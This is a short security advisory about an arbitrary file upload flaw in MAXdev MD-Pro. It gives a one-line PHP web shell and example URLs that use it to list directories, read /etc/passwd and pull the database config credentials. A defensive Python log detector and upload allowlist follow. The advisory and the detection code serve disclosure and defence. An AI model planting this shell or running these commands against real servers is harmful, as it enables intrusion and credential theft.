MAXdev MD-Pro Arbitrary Remote File Upload Vulnerability
No exploit is required. The following proof of concept is available:

Upload a file with the .inc extension containing this code:

<?php error_reporting(0); system($_GET[c]); ?>

Now list directories with:
http://www.example.com/upload/dl/[filename].inc?c=ls%20-la

See the /etc/passwd file:
http://www.example.com/upload/dl/[filename].inc?c=cat%20/etc/passwd

See the database username and password:
http://www.example.com/upload/dl/[filename].inc?c=cat%20.././config/md-config.php
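As an added defensive example, not part of this advisory: the Python below flags access-log requests that fetch a script-extension file under the advisory's /upload/dl/ path (the sign that an uploaded file is being executed as code) and shows the extension allowlist an upload handler should apply. The sample log lines, the allowlist contents and the function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Extensions the web server hands to PHP if they sit in a web-reachable upload
# directory; .inc is the one the advisory's PoC uses.
SCRIPT_EXTENSIONS = {"inc", "php", "php3", "php4", "php5", "phtml", "phar"}
UPLOAD_PREFIX = "/upload/dl/"  # upload directory named in the advisory
# Assumed allowlist for the upload handler; adjust to what the site needs.
SAFE_UPLOAD_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"}

# Request field of an Apache/nginx combined log line: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

def flag_request(log_line):
    """Return an alert string if the request fetches a script-extension file
    under UPLOAD_PREFIX (an uploaded file being executed), else None."""
    m = REQ_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)  # decode %2E-style obfuscation before checking
    if not path.startswith(UPLOAD_PREFIX):
        return None
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    if ext not in SCRIPT_EXTENSIONS:
        return None
    params = parse_qs(parts.query)  # decoded, so the alert shows the command
    return f"executable upload {path} requested with params={params}"

def upload_name_allowed(filename):
    """Upload-handler allowlist: strip any directory part, require exactly one
    extension, accept only allowlisted ones (rejects shell.inc and x.php.jpg)."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    pieces = name.split(".")
    if len(pieces) != 2 or not pieces[0] or not pieces[1]:
        return False
    return pieces[1].lower() in SAFE_UPLOAD_EXTENSIONS

# Constructed sample log lines (not real traffic): a benign image fetch, a
# request matching the advisory's PoC, and an unrelated request to index.php.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /upload/dl/photo.jpg HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /upload/dl/shell.inc?c=cat%20/etc/passwd HTTP/1.1" 200 1024',
    '192.0.2.11 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?c=ls HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    alerts = [(n, a) for n, l in enumerate(SAMPLE_LOG, 1) if (a := flag_request(l))]
    print(*alerts, sep="\n")
```

The same allowlist logic belongs in the upload handler itself; the log check only tells you after the fact that a stored file was requested as a script.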